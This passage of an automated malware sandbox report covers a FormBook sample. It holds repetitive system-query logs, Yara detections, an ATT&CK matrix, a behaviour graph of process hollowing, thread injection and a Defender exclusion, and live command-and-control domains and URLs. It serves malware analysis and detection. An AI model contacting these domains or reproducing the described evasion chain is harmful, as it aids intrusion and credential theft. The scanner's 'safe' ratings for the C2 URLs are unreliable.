          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 9.2.Ms5nQdSz5l.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.Ms5nQdSz5l.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 9.2.Ms5nQdSz5l.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.Ms5nQdSz5l.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Scheduled Task/Job1Process Injection612Disable or Modify Tools11Credential API Hooking1File and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsScheduled Task/Job1Deobfuscate/Decode Files or Information1Input Capture1System Information Discovery112Remote Desktop ProtocolCredential API Hooking1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsScheduled Task/Job1Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information3Security Account ManagerQuery Registry1SMB/Windows Admin SharesInput Capture1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing3NTDSSecurity Software Discovery231Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptTimestomp1LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonRootkit1Cached Domain CredentialsVirtualization/Sandbox Evasion41VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading1DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion41Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection612/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 404105 Sample: Ms5nQdSz5l.exe Startdate: 04/05/2021 Architecture: WINDOWS Score: 100 51 www.4980057280880200.xyz 2->51 57 Found malware configuration 2->57 59 Malicious sample detected (through community Yara rule) 2->59 61 Multi AV Scanner detection for submitted file 2->61 63 9 other signatures 2->63 11 Ms5nQdSz5l.exe 7 2->11         started        signatures3 process4 file5 43 C:\Users\user\AppData\...\zFVxYeAVOjnwuB.exe, PE32 11->43 dropped 45 C:\...\zFVxYeAVOjnwuB.exe:Zone.Identifier, ASCII 11->45 dropped 47 C:\Users\user\AppData\Local\...\tmp7635.tmp, XML 11->47 dropped 49 C:\Users\user\AppData\...\Ms5nQdSz5l.exe.log, ASCII 11->49 dropped 73 Uses schtasks.exe or at.exe to add and modify task schedules 11->73 75 Adds a directory exclusion to Windows Defender 11->75 77 Tries to detect virtualization through RDTSC time measurements 11->77 79 Injects a PE file into a foreign processes 11->79 15 Ms5nQdSz5l.exe 11->15         started        18 powershell.exe 24 11->18         started        20 powershell.exe 23 11->20         started        22 2 other processes 11->22 signatures6 process7 signatures8 81 Modifies the context of a thread in another process (thread injection) 15->81 83 Maps a DLL or memory area into another process 15->83 85 Sample uses process hollowing technique 15->85 87 Queues an APC in another process (thread injection) 15->87 24 explorer.exe 15->24 injected 28 conhost.exe 18->28         started        30 conhost.exe 20->30         started        32 conhost.exe 22->32         started        34 conhost.exe 22->34         started        process9 dnsIp10 53 www.safifinancial.info 24->53 55 safifinancial.info 34.102.136.180, 49717, 80 GOOGLEUS United States 24->55 71 System process connects to network (likely due to code injection or exploit) 24->71 36 mstsc.exe 24->36         started        signatures11 process12 signatures13 65 Modifies the context of a thread in another process (thread injection) 36->65 67 Maps a DLL or memory area into another process 36->67 69 Tries to detect virtualization through RDTSC time measurements 36->69 39 cmd.exe 36->39         started        process14 process15 41 conhost.exe 39->41         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Ms5nQdSz5l.exe26%VirustotalBrowse
          Ms5nQdSz5l.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe100%Joe Sandbox ML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          9.2.Ms5nQdSz5l.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          http://crl.microszt0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.safifinancial.info/op9s/?kxl0=3OIkoiHCzE1hCgamnAGWyNY23l3GjmrmFj0eumUXTWZXUNP+r8qibU1KsAhTf4lNnle5&kPm0g=K8kX0%Avira URL Cloudsafe
          http://crl.microsoft.0%URL Reputationsafe
          http://crl.microsoft.0%URL Reputationsafe
          http://crl.microsoft.0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          www.kelurahanpatikidul.xyz/op9s/0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          safifinancial.info
          34.102.136.180
          truefalse
            unknown
            www.safifinancial.info
            unknown
            unknowntrue
              unknown
              www.4980057280880200.xyz
              unknown
              unknowntrue
                unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.safifinancial.info/op9s/?kxl0=3OIkoiHCzE1hCgamnAGWyNY23l3GjmrmFj0eumUXTWZXUNP+r8qibU1KsAhTf4lNnle5&kPm0g=K8kXfalse
                • Avira URL Cloud: safe
                unknown
                www.kelurahanpatikidul.xyz/op9s/true
                • Avira URL Cloud: safe
                low

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpfalse
                  high
                  http://www.fontbureau.comexplorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpfalse
                    high
                    http://www.fontbureau.com/designersGexplorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpfalse
                      high
                      http://www.fontbureau.com/designers/?explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpfalse
                        high
                        http://www.founder.com.cn/cn/bTheexplorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000003.340504471.000000000095B000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000003.340504471.000000000095B000.00000004.00000001.sdmpfalse
                          high
                          http://www.fontbureau.com/designers?explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpfalse
                            high
